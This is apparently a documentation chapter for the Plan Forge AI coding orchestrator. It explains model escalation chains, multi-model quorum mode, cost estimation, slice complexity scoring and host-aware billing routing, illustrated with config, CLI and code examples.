Escalation Chains

When a model fails a slice, the orchestrator automatically escalates to the next model in the chain:

.forge.json

{
  "escalationChain": ["grok-4", "claude-opus-4.6", "gpt-5.2-codex"]
}

Model A fails → Model B retries the same slice → Model C retries if B fails too. A slice-escalated WebSocket event is emitted at each step. No manual intervention is required.
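
The escalation loop can be sketched as follows. It is a simplified, synchronous illustration: `runWithEscalation`, the `runSlice` callback (returning true on a pass), and `onEscalate` (standing in for the slice-escalated event) are all hypothetical names, not orchestrator APIs.

```javascript
// Tries each model in chain order until one passes the slice.
// `runSlice(model)` is a hypothetical callback that returns true on a pass.
// `onEscalate(from, to)` stands in for emitting the slice-escalated event.
function runWithEscalation(chain, runSlice, onEscalate = () => {}) {
  for (let i = 0; i < chain.length; i++) {
    if (runSlice(chain[i])) {
      return { passed: true, model: chain[i], attempts: i + 1 };
    }
    // Only signal an escalation when there is a next model to hand off to.
    if (i + 1 < chain.length) onEscalate(chain[i], chain[i + 1]);
  }
  return { passed: false, model: null, attempts: chain.length };
}
```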

Forge Intelligence: escalation chains auto-tune from history. After 5+ recorded slices, loadEscalationChain() reorders models by success rate × cost efficiency, and the best-performing, cheapest model moves to position 1 automatically. No configuration is needed; just run plans and the forge learns.
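
To make the reordering concrete, here is a sketch of one possible scoring. It is not loadEscalationChain() itself, and several details are assumptions: cost efficiency is taken to be 1 / average cost, the five-slice minimum is applied per model, and the `history` field names are invented for illustration.

```javascript
// Reorders a chain by successRate * costEfficiency, best first.
// Assumptions: costEfficiency = 1 / avgCost, and models with fewer than
// `minSlices` recorded slices keep their configured order at the end.
function reorderChain(chain, history, minSlices = 5) {
  const score = (m) => history[m].successRate / history[m].avgCost;
  const known = chain.filter((m) => history[m] && history[m].slices >= minSlices);
  const unknown = chain.filter((m) => !known.includes(m));
  return [...known].sort((a, b) => score(b) - score(a)).concat(unknown);
}
```

Models without enough history are left in place rather than scored, so a new model is not ranked on thin data.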

Figure 14-1. Escalation chain: grok-4 fails and escalates to claude-opus-4.6, which fails and escalates to gpt-5.2-codex, which passes.

Quorum Mode

Multi-model consensus for complex slices. Multiple models analyze the same problem independently, then a reviewer synthesizes the best approach.

OAuth-only quorum works. If you have a GitHub Copilot subscription and the copilot CLI is logged in, --quorum=power|speed|auto fans out across multiple models without any API keys: each leg is a separate copilot subprocess invoked with a different --model flag. The orchestrator's quorum dispatcher (quorumDispatch) calls spawnWorker once per model inside Promise.all; filterQuorumModels drops any model whose CLI or credentials aren't reachable, so the quorum degrades gracefully instead of failing.

Add API keys to mix providers. Set XAI_API_KEY (or drop it in .forge/secrets.json) and a Grok leg joins the same parallel fan-out alongside your Copilot-served legs; see the worked example below.

Not to be confused with Forge-Master's dispatchQuorum, which is HTTP-only and does require per-model API keys. That surface only powers the chat reasoning lane, not run-plan.

Quorum flow: dispatch to 3 models, independent analysis, reviewer synthesizes, then execute — Figure 14-2. Quorum flow

Terminal

# Force quorum on all slices
pforge run-plan docs/plans/Phase-7.md --quorum

# Auto-quorum: only trigger for complex slices (threshold ≥ 6)
pforge run-plan docs/plans/Phase-7.md --quorum=auto

# Custom threshold (1-10, higher = fewer slices use quorum)
pforge run-plan docs/plans/Phase-7.md --quorum=auto --quorum-threshold 8

# Flagship preset (Opus + GPT-5.3-Codex + Grok 4.20, threshold 5)
pforge run-plan docs/plans/Phase-7.md --quorum=power

# Fast preset (Sonnet + GPT-5.4-mini + Grok 4.1 Fast, threshold 7)
pforge run-plan docs/plans/Phase-7.md --quorum=speed

Setting	Effect	Cost Impact
`--quorum`	Every slice gets multi-model consensus	3× normal cost
`--quorum=auto`	Only slices above complexity threshold	1.2–1.5× normal cost
`--quorum=power`	Flagship models (Opus + GPT-5.3-Codex + Grok 4.20), threshold 5, 5min timeout	3× at threshold 5
`--quorum=speed`	Fast models (Sonnet + GPT-5.4-mini + Grok 4.1 Fast), threshold 7, 2min timeout	1.5× at threshold 7
No flag	Single model per slice	1× baseline cost

Worked Example — 2× Copilot CLI + 1× Grok API v2.83+

The most common production setup: ride your Copilot subscription for the bulk of the quorum and add one direct-API leg (Grok or OpenAI) for diversity. Both kinds of leg run in the same Promise.all, so no special config is needed to "merge" them.

Step 1: declare the model mix in .forge.json:

.forge.json

{
  "quorum": {
    "models": [
      "gpt-5.3-codex",                  // → copilot CLI subprocess
      "claude-sonnet-4.6",              // → copilot CLI subprocess
      "grok-4.20-0309-reasoning"        // → direct-API worker (XAI_API_KEY)
    ],
    "reviewerModel": "claude-opus-4.7"  // → copilot CLI subprocess
  }
}

Step 2: provision the Grok key (one of):

Terminal

# Option A: env var (per-shell, PowerShell syntax)
$env:XAI_API_KEY = "xai-..."
# bash/zsh equivalent: export XAI_API_KEY="xai-..."

# Option B: project-local secrets file (gitignored)
# .forge/secrets.json
{ "XAI_API_KEY": "xai-..." }

Step 3: run with quorum:

Terminal

# See the projected cost across all four modes first (always tool-backed)
pforge run-plan --estimate docs/plans/Phase-7.md

# Then run: quorum-eligible slices fan out to all three models in parallel
pforge run-plan docs/plans/Phase-7.md --quorum=auto

What happens at slice dispatch:

quorumDispatch sees three models in the config.
spawnWorker is called three times concurrently. The first two route to the local copilot CLI (no key needed, rides your Copilot subscription); the third routes to the xAI HTTP worker using XAI_API_KEY.
All three return their dry-run analyses. quorumReview synthesises them via the reviewer model into a single enhancedPrompt.
The actual slice execution runs once with that synthesised prompt, not three concurrent edits.

If the Grok key is missing, filterQuorumModels drops Grok from the list at run-plan startup and the quorum proceeds with the two Copilot-served legs. Nothing fails; you just get a smaller jury.
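
The graceful-degradation step can be sketched as a plain filter. The function below is a hypothetical re-creation of the idea, not the real filterQuorumModels; the `copilotCli` flag and the `env` argument are assumptions introduced for the example.

```javascript
// Hypothetical filter: keep only the models whose route is reachable.
function filterReachableModels(models, { copilotCli, env }) {
  return models.filter((model) => {
    // grok-* is direct-API only, so it needs XAI_API_KEY.
    if (model.startsWith("grok-")) return Boolean(env.XAI_API_KEY);
    // The other legs in this example ride the logged-in copilot CLI.
    return copilotCli;
  });
}

const models = ["gpt-5.3-codex", "claude-sonnet-4.6", "grok-4.20-0309-reasoning"];

const withoutKey = filterReachableModels(models, { copilotCli: true, env: {} });
console.log(withoutKey); // [ 'gpt-5.3-codex', 'claude-sonnet-4.6' ]

const withKey = filterReachableModels(models, {
  copilotCli: true,
  env: { XAI_API_KEY: "xai-..." },
});
console.log(withKey.length); // 3
```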

Quorum Mode vs Quorum Advisory — What's the Difference? v2.78+

Two surfaces use the word "quorum." They're related but operate at different scopes:

	Quorum Mode (this section)	Quorum Advisory (Forge-Master)
Where	`forge_run_plan` / `--quorum=…`	`forge_master_ask` / Studio tab
Decision unit	Per slice	Per prompt
Auto-winner?	Yes, reviewer synthesizes one approach	No, human picks the reply
Activation	`--quorum=auto/power/speed` CLI flag	`forgeMaster.quorumAdvisory: "auto" | "always"` in `.forge.json`
Cost preview	`forge_estimate_quorum` tool	`quorum-estimate` SSE event before dispatch (cancellable)
Best for	High-complexity slice execution that benefits from multi-model consensus	High-stakes judgment calls (architectural choices, trade-offs) where dissent is the signal

You can use both. Quorum Mode runs slice execution; Quorum Advisory helps you decide what to put in the slice in the first place.

Estimating Quorum Cost — `forge_estimate_quorum` v2.83+

Cost estimates come from tools, not chat math. When deciding which quorum mode to run, or showing the user dollar amounts in any picker, call forge_estimate_quorum first. Hand-computed quorum estimates have been observed to overshoot reality by an order of magnitude (Phase-COST-TOKEN-COVERAGE field reports). The agent guidance shipped in .github/copilot-instructions.md requires this for any quorum picker UI.

forge_estimate_quorum projects the cost of a plan under all four quorum modes in one round-trip, so there is no need to run --estimate four separate times. It returns per-mode totals plus a per-slice breakdown showing which slices cleared the threshold.

forge_estimate_quorum flow: tool call with planPath, parsePlan + scoreSliceComplexity, four parallel mode estimations (false/auto/power/speed), comparison JSON output with per-mode totals and per-slice breakdown — Figure 14-3. forge_estimate_quorum flow

Calling the tool

MCP / Copilot Chat

// Direct MCP call
forge_estimate_quorum({
  planPath: "docs/plans/Phase-7.md",
  resumeFrom: 1   // optional, only estimate slices ≥ N
})

// CLI equivalent (runs all four modes under the hood)
pforge run-plan docs/plans/Phase-7.md --estimate --quorum-compare

Response shape

Response (abbreviated)

{
  "false":  { "totalCostUSD": 0.28, "baseCostUSD": 0.28, "overheadUSD": 0,
              "quorumSliceCount": 0, "totalSliceCount": 7, "confidence": "historical" },
  "auto":   { "totalCostUSD": 0.42, "baseCostUSD": 0.28, "overheadUSD": 0.14,
              "quorumSliceCount": 1, "totalSliceCount": 7, "confidence": "historical" },
  "power":  { "totalCostUSD": 12.50, "baseCostUSD": 0.42, "overheadUSD": 12.08,
              "quorumSliceCount": 3, "totalSliceCount": 7, "confidence": "historical" },
  "speed":  { "totalCostUSD": 1.20, "baseCostUSD": 0.31, "overheadUSD": 0.89,
              "quorumSliceCount": 1, "totalSliceCount": 7, "confidence": "historical" },
  "slices": [
    { "sliceNumber": 1, "complexityScore": 3, "projectedCostUSD": 0.04, "quorumEligible": false },
    { "sliceNumber": 2, "complexityScore": 6, "projectedCostUSD": 4.18, "quorumEligible": true  },
    { "sliceNumber": 3, "complexityScore": 7, "projectedCostUSD": 4.22, "quorumEligible": true  },
    ...
  ]
}

Field	Meaning
`baseCostUSD`	What the plan costs without quorum overhead, single-model run for every slice
`overheadUSD`	Δ added by the extra quorum legs + reviewer synthesis. `baseCostUSD + overheadUSD = totalCostUSD`.
`quorumSliceCount`	How many slices cleared the mode's threshold and will fan out to multiple models
`confidence`	`"historical"` when calibrated against ≥ 3 prior runs, `"heuristic"` for cold-start projects
`slices[].complexityScore`	The 1–10 score from scoreSliceComplexity()
`slices[].quorumEligible`	Whether this slice cleared the threshold for the requested mode
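
As a rough illustration of consuming this response, the sketch below checks the documented `baseCostUSD + overheadUSD = totalCostUSD` relationship and computes each mode's multiplier against the no-quorum run. The `compareModes` helper is hypothetical; the numbers are copied from the abbreviated response above with the `slices` array omitted.

```javascript
// Abbreviated response copied from the example above (slices omitted).
const estimate = {
  false: { totalCostUSD: 0.28, baseCostUSD: 0.28, overheadUSD: 0, quorumSliceCount: 0 },
  auto: { totalCostUSD: 0.42, baseCostUSD: 0.28, overheadUSD: 0.14, quorumSliceCount: 1 },
  power: { totalCostUSD: 12.5, baseCostUSD: 0.42, overheadUSD: 12.08, quorumSliceCount: 3 },
  speed: { totalCostUSD: 1.2, baseCostUSD: 0.31, overheadUSD: 0.89, quorumSliceCount: 1 },
};

// Hypothetical helper: multiplier of each mode relative to the no-quorum run.
function compareModes(est) {
  const baseline = est.false.totalCostUSD;
  return ["false", "auto", "power", "speed"].map((mode) => {
    const m = est[mode];
    // Tolerate floating-point noise when checking base + overhead = total.
    const consistent = Math.abs(m.baseCostUSD + m.overheadUSD - m.totalCostUSD) < 0.005;
    return { mode, multiplier: Number((m.totalCostUSD / baseline).toFixed(1)), consistent };
  });
}

const comparison = compareModes(estimate);
console.log(comparison.map((r) => `${r.mode}: ${r.multiplier}x`).join(", "));
// false: 1x, auto: 1.5x, power: 44.6x, speed: 4.3x
```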

Worked cost example: 7-slice fixture plan

The numbers above come from the heuristic fixture used in capabilities.mjs; they are illustrative, not measured. For a typical mid-size plan (10–15 slices, 1–3 quorum-eligible), real-world numbers from the Plan Forge dogfood corpus look like:

Mode	Total cost	Multiplier vs baseline	Slices fanned out	Use when
`false` (off)	~$0.30 – $2.00	1.0×	0 / 12	Mechanical work, conversions, doc edits
`--quorum=auto`	~$0.40 – $3.50	1.2 – 1.8×	1–2 / 12	Default for normal feature work
`--quorum=speed`	~$1.00 – $4.00	1.5 – 2.5×	1 / 12 (threshold 7)	Tight budget, want consensus only on the genuinely hard slices
`--quorum=power`	~$10 – $25	10 – 30×	2–4 / 12 (threshold 5)	Architectural slices, security-critical paths, irreversible migrations
`--quorum` (force-all)	~$30 – $80	30 – 100×	12 / 12	Almost never. Use `auto` + selective `--quorum-threshold` instead.

Numbers are order-of-magnitude; actual cost depends on slice scope size, host (subscription-covered vs pay-per-token), and the cost-calibration ratio in .forge/cost-history.json. Always estimate before running.

Single-slice variant: forge_estimate_slice (companion tool) returns cost for one slice with rationale strings like "threshold 5 met: complexity 6" or "mode false: quorum disabled". Useful when you want to ask “is this specific slice worth quorum?” without re-estimating the whole plan.

Complexity Scoring Rubric — How a Slice Earns Its Score v2.83+

What makes a slice "complex enough to need quorum"? The orchestrator's scoreSliceComplexity() function (see orchestrator.mjs) reads seven weighted signals from the parsed slice and produces an integer 1–10. Modes then compare that score against their threshold to decide whether to fan out.

Quorum complexity scoring rubric: seven signals (scope files, dependencies, security keywords, database keywords, gate lines, task count, historical failure rate) with their weights, fed through scoreSliceComplexity to produce a 1-10 score, then routed by threshold gate (power=5, auto=6, speed=7) to either fan-out or single-model run — Figure 14-4. Quorum complexity scoring rubric

The seven signals

Signal	Weight	Source	What it captures
Scope breadth	0.20	`slice.scope[].length / 5`	How many files this slice touches. Wide scope ⇒ more places to make a mistake.
Dependencies	0.20	`slice.depends[].length / 4`	How many earlier slices this one builds on. Deep dependencies ⇒ harder reasoning chain.
Security keywords	0.15	Hits in title + tasks + gate	Matches against `auth, crypto, secret, token, password, jwt, oauth, …`. Security mistakes are expensive to roll back.
Database keywords	0.15	Hits in title + tasks + gate	Matches against `migration, schema, sql, index, constraint, foreign key, …`. Schema changes are often irreversible.
Gate complexity	0.10	Non-blank lines in `validationGate`	A long validation gate is a proxy for "this slice has a lot of correctness conditions to satisfy."
Task count	0.10	`slice.tasks[].length / 10`	Many small tasks ⇒ more chances for a single model to lose track.
Historical failure rate	0.10	`.forge/runs/index.jsonl` (last 20)	If past slices with similar title words have failed often, this one gets nudged up. Self-tuning over time.

The raw weighted sum (0–1) is mapped to the final integer via clamp(1, 10, round(raw × 9) + 1).

Threshold mapping

Mode	Threshold	What clears it (typical)
`--quorum=power`	5	Slices touching 3+ files or with deep deps or mentioning auth/schema
`--quorum=auto`	6 (CLI default)	The above plus a substantial gate or 6+ tasks
`--quorum=speed`	7	Only the genuinely hard slices, wide scope and security/db keywords and failure history
Custom	`--quorum-threshold N`	Override per run; `1` = quorum everything, `10` = quorum almost nothing
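
The threshold gate itself is a single comparison. A minimal sketch, assuming a hypothetical `isQuorumEligible` helper; the preset thresholds come from the table above, and force-all `--quorum` (every slice) is deliberately left out.

```javascript
// Preset thresholds from the table above.
const MODE_THRESHOLDS = { power: 5, auto: 6, speed: 7 };

// Hypothetical helper: does a slice with this score fan out under this mode?
// `customThreshold` plays the role of --quorum-threshold N.
function isQuorumEligible(score, mode, customThreshold) {
  const threshold = customThreshold ?? MODE_THRESHOLDS[mode];
  if (threshold === undefined) return false; // quorum off or unknown mode
  return score >= threshold;
}

console.log(isQuorumEligible(6, "power"));   // true
console.log(isQuorumEligible(6, "auto"));    // true
console.log(isQuorumEligible(6, "speed"));   // false
console.log(isQuorumEligible(6, "auto", 8)); // false (custom threshold 8)
```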

Real-plan calibration: across the Plan Forge dogfood corpus, observed maximum scores land between 4 and 6, and most slices score 2–4. That means threshold 5 is the sweet spot for power mode (catches the architectural slices), threshold 6 is conservative for auto (catches roughly 10–25% of slices in a typical phase), and threshold 7 fires on <5% of slices. The Adaptive Quorum Threshold system in .forge/quorum-history.json auto-tunes these from your project's run history.

Worked example

Consider a slice titled "Add JWT refresh-token rotation with Redis backing" with 4 scope files, depends on slices 2 and 5, 7 tasks, a 12-line validation gate, and 1 prior failure in 8 historical matches:

scoreSliceComplexity walkthrough

scope    = min(4/5, 1.0)   × 0.20 = 0.16
depends  = min(2/4, 1.0)   × 0.20 = 0.10
security = min(2/3, 1.0)   × 0.15 = 0.10   // "jwt", "token"
database = min(0/3, 1.0)   × 0.15 = 0.00
gate     = min(12/5, 1.0)  × 0.10 = 0.10
tasks    = min(7/10, 1.0)  × 0.10 = 0.07
history  = (1/8)           × 0.10 = 0.0125
                                    ──────
raw                              = 0.5425
score = clamp(1, 10, round(0.5425 × 9) + 1) = 6

→ clears threshold for: power (≥5), auto (≥6)
→ does NOT clear:        speed (≥7)
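
The walkthrough can be reproduced in a few lines. This is an illustrative re-implementation of the rubric, not the code in orchestrator.mjs: the divisors for keyword hits (3) and gate lines (5) are taken from the walkthrough above, and the input field names are assumptions.

```javascript
// Cap each normalized signal at 1.0, as the walkthrough does with min(x, 1.0).
const cap = (x) => Math.min(x, 1.0);

// Hypothetical input shape; weights are the seven from the signals table.
function scoreSliceComplexity(s) {
  const raw =
    cap(s.scopeFiles / 5) * 0.2 +
    cap(s.dependsCount / 4) * 0.2 +
    cap(s.securityHits / 3) * 0.15 +
    cap(s.databaseHits / 3) * 0.15 +
    cap(s.gateLines / 5) * 0.1 +
    cap(s.taskCount / 10) * 0.1 +
    s.failureRate * 0.1;
  // clamp(1, 10, round(raw × 9) + 1)
  const score = Math.max(1, Math.min(10, Math.round(raw * 9) + 1));
  return { raw, score };
}

// The JWT refresh-token slice from the worked example.
const jwtSlice = {
  scopeFiles: 4, dependsCount: 2, securityHits: 2, databaseHits: 0,
  gateLines: 12, taskCount: 7, failureRate: 1 / 8,
};
const { raw, score } = scoreSliceComplexity(jwtSlice);
console.log(raw.toFixed(4), score); // 0.5425 6
```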

Multi-Agent Quorum Turns — `PFORGE_QUORUM_TURN` v2.78+

When quorum runs in multi-agent mode (Claude → Codex → Cursor handoffs), the orchestrator sets the PFORGE_QUORUM_TURN environment variable for the duration of each quorum-leg invocation. This is a coordination signal, not user-facing config, but it shows up in logs and matters when debugging hook behavior.

What the variable controls

Hook / system	Behavior when `PFORGE_QUORUM_TURN` is set
`PreAgentHandoff` hook	Skipped. Returns `{ triggered: false, skippedReason: "PFORGE_QUORUM_TURN active" }` and logs `[PreAgentHandoff] skipping context injection, PFORGE_QUORUM_TURN active`. See `orchestrator.mjs` ~L7585.
OpenClaw snapshot post	Skipped. No drift / MTTR / incident snapshot is sent between quorum legs.
Cost telemetry	Per-leg cost is tagged `quorumTurn: true` in `slice-N.json` so the Cost Report can roll up the legs into a single quorum line item.
Tracing	Each leg gets its own trace span but with a shared `quorumGroupId` so dashboards can collapse them.

Why skip context injection?

Quorum exists to get independent analyses from each model. If PreAgentHandoff injected the same drift / MTTR / open-incident context into every leg, the models would converge, defeating the whole point. The reviewer (the synthesizing model) does get the full handoff context when it merges the proposals, because that's where the project-wide state actually matters.
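
A minimal sketch of the skip path, assuming a hypothetical `preAgentHandoff` wrapper. The skip payload and log line are the ones quoted in the table above; the `{ triggered: true }` return and the "any non-empty value counts as set" check are assumptions.

```javascript
// Hypothetical hook wrapper: `env` is passed in so the example does not
// depend on the real process environment.
function preAgentHandoff(env, injectContext) {
  if (env.PFORGE_QUORUM_TURN) {
    console.log("[PreAgentHandoff] skipping context injection, PFORGE_QUORUM_TURN active");
    return { triggered: false, skippedReason: "PFORGE_QUORUM_TURN active" };
  }
  injectContext(); // the reviewer and normal handoffs still get full context
  return { triggered: true };
}

let injected = 0;
const duringLeg = preAgentHandoff({ PFORGE_QUORUM_TURN: "1" }, () => injected++);
const normal = preAgentHandoff({}, () => injected++);
console.log(duringLeg.triggered, normal.triggered, injected); // false true 1
```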

Don't set this variable manually. It's owned by the orchestrator and the multi-agent dispatch layer. Setting it yourself in a shell will cause the next PreAgentHandoff to silently skip, which can mask drift alerts. If you see "PFORGE_QUORUM_TURN active" in logs outside a quorum run, something has leaked the variable; clear it with Remove-Item Env:PFORGE_QUORUM_TURN (PowerShell) or unset PFORGE_QUORUM_TURN (bash).

📄 Cross-references: Chapter 13 — Multi-Agent for the handoff model · Chapter 20 — Remote Bridge for the OpenClaw snapshot path · Forge-Master Quorum Advisory for the per-prompt counterpart.

Quorum Quality Examples — What 3 Models Catch That 1 Doesn't

The argument for quorum mode is mostly abstract: "synthesis effect," "independent analyses," "reviewer picks the cleaner approach." A single side-by-side run of the same task makes the argument concrete. The numbers below come from a controlled A/B run on a real C# invoicing slice: same plan, same gates, same acceptance criteria; one execution with the default single-model worker, one with three-model quorum. Both passed all gates and the independent reviewer. The difference is in how they passed.

Metric	Single (control)	Quorum (3-model)
Tests written	15	18 (+20%)
Helper extraction	Inline code, repeated 3×	Extracted helpers, single source
Test dates	Hardcoded literals	Relative offsets
.NET pattern	Generic `ValidationException`	`ArgumentException.ThrowIfNullOrWhiteSpace`
Edge cases	Standard happy path	Voided invoice regen, sequence races
Total cost	$0.62	$0.84 (+35%)

$0.22 of additional spend, both pass review, and the quorum run is measurably more maintainable. Four named patterns drive the difference.

Pattern 1 — DRY helper extraction

The single-model run inlined volume-discount math in three call sites with slight variations. The quorum run extracted reusable helpers because the synthesizer saw multiple proposals and picked the one that didn't repeat itself.

Representative example. The quorum run produced IsWeekend(), CalculateVolumeDiscount(), and ApplyBankersRounding() as private static helpers, called from each invoicing entry point. The single-model run inlined the equivalent ternary expressions at every call site. Same behavior; different debuggability when the discount tier changes a year from now.

// Single model, inlined at three call sites
var discount = quantity >= 100 ? 0.15m : quantity >= 50 ? 0.10m : quantity >= 10 ? 0.05m : 0m;

// Quorum, extracted helper
private static decimal CalculateVolumeDiscount(int quantity) => quantity switch
{
    >= 100 => 0.15m,
    >= 50  => 0.10m,
    >= 10  => 0.05m,
    _      => 0m,
};

Pattern 2 — Robust test dates

Single-model tests pinned dates to literal calendar days. Those tests will fail when those dates pass and the business logic correctly refuses future invoices. Quorum tests used relative offsets that stay green forever.

Representative example. The control run wrote new DateTime(2026, 3, 15) in test fixtures. The quorum run wrote DateTime.Now.AddDays(-7). Identical intent; only one survives March 16th.

// Single model, breaks on March 16th
var invoice = new Invoice { Date = new DateTime(2026, 3, 15) };

// Quorum, stays green forever
var invoice = new Invoice { Date = DateTime.Now.AddDays(-7) };

Pattern 3 — Modern .NET patterns

Validation guard clauses are a tell. The control run used the generic exception path; the quorum run reached for the modern static-helper API that ships better error messages and is the current recommended pattern.

Representative example. The control run used throw new ValidationException("Customer name is required"). The quorum run used ArgumentException.ThrowIfNullOrWhiteSpace(customerName). The quorum reviewer chose the .NET 8+ helper because one of the three workers proposed it; the synthesizer recognized it as the modern equivalent.

// Single model, generic, manual message
if (string.IsNullOrWhiteSpace(customerName))
    throw new ValidationException("Customer name is required");

// Quorum, modern .NET 8+ helper, auto-generated message including parameter name
ArgumentException.ThrowIfNullOrWhiteSpace(customerName);

Pattern 4 — Edge-case coverage the control missed entirely

The +3 tests in the quorum run weren't padding. They were edge cases the single model never wrote because no one model considered both the happy path and the failure mode at the same time. With three independent analyses, edge cases that one model thinks of get surfaced into the synthesis.

Representative example. The quorum run added a test for "regenerating an invoice after the original was voided" (VoidedInvoice_Regenerate_AssignsNewSequenceNumber) and a test for "concurrent invoice number assignment under two simultaneous requests" (ConcurrentInvoiceCreation_DoesNotReuseSequenceNumbers). Neither appeared in the control run. Both are exactly the kind of test that catches a production bug six weeks after launch.

The synthesis mechanism

The pattern across all four examples is the same: one model proposes one thing, another model proposes a cleaner version, the reviewer picks the cleaner one. Inline code vs extracted helper: extraction wins. Hardcoded date vs relative offset: relative offset wins. Generic exception vs modern helper: modern helper wins. Standard tests vs edge-case tests: edge-case tests win. The quorum doesn't make any individual model smarter; it makes the worst-case output of each model less likely to be what ships.

When this pays off

Slice type	Quorum worth it?	Why
Auth / billing / payments	Yes	Edge cases here are production bugs that cost money; +35% cost is cheap insurance
Database migrations	Yes	Wrong migration is irreversible; multi-model agreement is a meaningful signal
Architectural slices (new layer, new pattern)	Yes	The synthesis effect produces noticeably cleaner abstractions
Bug fix with tight reproducer	Maybe	If the fix is one line and the test is obvious, single model is fine
CRUD endpoint, well-trodden pattern	Probably not	All three models will produce nearly identical code; +35% cost buys nothing new
Pure docs slice	No	Synthesis effect doesn't apply to prose; pick the cheapest model that writes well

--quorum=auto applies this judgment per slice using the complexity scoring rubric. Manual --quorum=power and --quorum=speed let you force the call when you already know which slices are which. The discovery harness uses single-model dispatch by default because audit findings are mechanical; the auto-smelt loop is the place to catch defects, not the discovery pass.

📄 Source: Quorum Mode — What 3 Models Catch That 1 Doesn't on the Plan Forge blog (the controlled A/B run that produced this comparison).

Host-Aware Routing v2.82+

Plan Forge runs in different IDEs and CLI hosts (VS Code + Copilot, Claude Code, Cursor, Windsurf, Zed, the bare CLI). Each host has its own billing surface. The host-aware routing preference (added v2.82, fixes #104) ensures users on non-Copilot hosts don't silently double-pay against subscriptions they're already paying for.

Host-aware routing decision tree: detectClientHost identifies the IDE/CLI host, .forge.json#routing.hostPreference is loaded (default auto), getRoutingPreference picks one of four surfaces. Auto+Copilot host -> gh-copilot first (subscription). Auto+non-Copilot -> direct API first (honor user's subscription). gh-copilot mode -> always Copilot. direct-api mode -> always direct. drop mode -> refuse gpt-* on non-Copilot host without OPENAI_API_KEY.

The four modes

Mode	Behavior	When to use
`auto` (default)	Claude Code / Cursor / Windsurf / Zed prefer direct API first; VS Code + Copilot / CLI keep `gh-copilot` first	Recommended. Honors whatever subscription the user is paying for.
`gh-copilot`	Always prefer `gh copilot` regardless of host	You want all spend to land on your Copilot subscription
`direct-api`	Always prefer direct HTTP APIs regardless of host	You're scripting with explicit per-call cost tracking
`drop`	Refuses `gpt-*` on non-Copilot hosts unless `OPENAI_API_KEY` is set. Strongest "honor the vendor" stance.	You want to fail loudly rather than spend silently

Configuration

{
  "routing": {
    "hostPreference": "auto"   // "auto" | "gh-copilot" | "direct-api" | "drop"
  }
}
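
The four modes can be read as a small decision function for Copilot-servable models such as `gpt-*`. The sketch below is hypothetical: the host identifiers other than `claude-code` are guessed spellings, the return labels are invented for the example, and the behaviour of `drop` outside the refusal case is assumed to match `auto`.

```javascript
// Assumed identifiers for hosts where gh-copilot stays first under "auto".
const COPILOT_HOSTS = new Set(["vscode-copilot", "cli"]);

// Hypothetical helper: which billing surface is tried first for a model.
function preferredSurface(host, hostPreference, { model, hasOpenAiKey }) {
  const onCopilotHost = COPILOT_HOSTS.has(host);
  switch (hostPreference) {
    case "gh-copilot":
      return "gh-copilot";
    case "direct-api":
      return "direct-api";
    case "drop":
      // Refuse gpt-* on non-Copilot hosts unless OPENAI_API_KEY is set.
      if (model.startsWith("gpt-") && !onCopilotHost && !hasOpenAiKey) return "refused";
      return onCopilotHost ? "gh-copilot" : "direct-api"; // assumed: same as auto
    case "auto":
    default:
      return onCopilotHost ? "gh-copilot" : "direct-api";
  }
}

const gpt = { model: "gpt-5.3-codex", hasOpenAiKey: false };
console.log(preferredSurface("claude-code", "auto", gpt));    // direct-api
console.log(preferredSurface("vscode-copilot", "auto", gpt)); // gh-copilot
console.log(preferredSurface("claude-code", "drop", gpt));    // refused
```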

Pre-run summary table

Before any model fires in quorum mode, the orchestrator emits a per-model billing surface table to stdout:

Quorum Pre-Run Summary (host: claude-code, preference: auto)
  ✓ claude-opus-4.7   → anthropic-direct      ($0.0061/req)
  ✓ gpt-5.3-codex     → openai-direct         ($0.0048/req)
  ⚠ grok-4.20         → xai-direct            ($0.0033/req)  needs XAI_API_KEY
  ✓ claude-sonnet-4.6 → anthropic-direct      ($0.0019/req)

Per-slice telemetry now records host, billingSurface, and billingWarning in slice-N.json so cost aggregation can distinguish subscription-covered vs pay-per-token spend in the Cost Report.

Cost Optimization

The orchestrator tracks model performance in .forge/model-performance.json: success rate, average cost, and duration per model. It auto-selects the cheapest model with >80% historical pass rate.
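
A minimal sketch of that selection rule. The field names (`successRate`, `avgCostUSD`) are assumptions, since the schema of .forge/model-performance.json is not shown here, and the sample numbers are made up for the example.

```javascript
// Hypothetical selector: cheapest model whose pass rate exceeds the floor.
function pickCheapestReliable(stats, minPassRate = 0.8) {
  const candidates = Object.entries(stats)
    .filter(([, s]) => s.successRate > minPassRate)
    .sort(([, a], [, b]) => a.avgCostUSD - b.avgCostUSD);
  return candidates.length > 0 ? candidates[0][0] : null;
}

// Made-up sample data, for illustration only.
const sampleStats = {
  "grok-4": { successRate: 0.72, avgCostUSD: 0.03 },
  "claude-sonnet-4.6": { successRate: 0.91, avgCostUSD: 0.05 },
  "claude-opus-4.6": { successRate: 0.96, avgCostUSD: 0.21 },
};

console.log(pickCheapestReliable(sampleStats)); // claude-sonnet-4.6
```

Here grok-4 is the cheapest model but falls below the 80% floor, so the next-cheapest model that clears it is chosen.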

Forge Intelligence. Three self-tuning systems reduce cost over time:

Cost Calibration: estimates auto-correct using a historical estimate-vs-actual ratio (clamped 0.5×–3×). After 3+ runs, --estimate accuracy improves automatically.
Adaptive Quorum Threshold: reads .forge/quorum-history.json to learn which slices actually need quorum. If <20% needed it, the threshold rises (fewer quorum runs = lower cost). If >60% needed it, the threshold drops.
Slice Auto-Split Advisory: --estimate flags slices with 2+ prior failures or >6 tasks as candidates for splitting. Smaller slices cost less and succeed more often.
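
The first two systems reduce to a clamp and a pair of comparisons. The sketch below is an illustration only: the 0.5×–3× clamp, the 3-run minimum, and the 20% / 60% cut-offs come from the text, while the use of a mean ratio, the step size of 1, the 1–10 bounds, and all function and field names are assumptions.

```javascript
const clamp = (x, lo, hi) => Math.min(hi, Math.max(lo, x));

// Cost Calibration: scale a raw estimate by the historical actual/estimate
// ratio, clamped to 0.5x-3x, once at least 3 runs are recorded.
function calibrate(rawEstimateUSD, history) {
  if (history.length < 3) return rawEstimateUSD;
  const ratios = history.map((run) => run.actualUSD / run.estimatedUSD);
  const mean = ratios.reduce((sum, r) => sum + r, 0) / ratios.length;
  return rawEstimateUSD * clamp(mean, 0.5, 3);
}

// Adaptive Quorum Threshold: raise when few slices needed quorum, lower when many did.
function adaptThreshold(threshold, fractionNeededQuorum) {
  if (fractionNeededQuorum < 0.2) return clamp(threshold + 1, 1, 10);
  if (fractionNeededQuorum > 0.6) return clamp(threshold - 1, 1, 10);
  return threshold;
}

const runs = [
  { estimatedUSD: 1, actualUSD: 2 },
  { estimatedUSD: 2, actualUSD: 4 },
  { estimatedUSD: 0.5, actualUSD: 1 },
];
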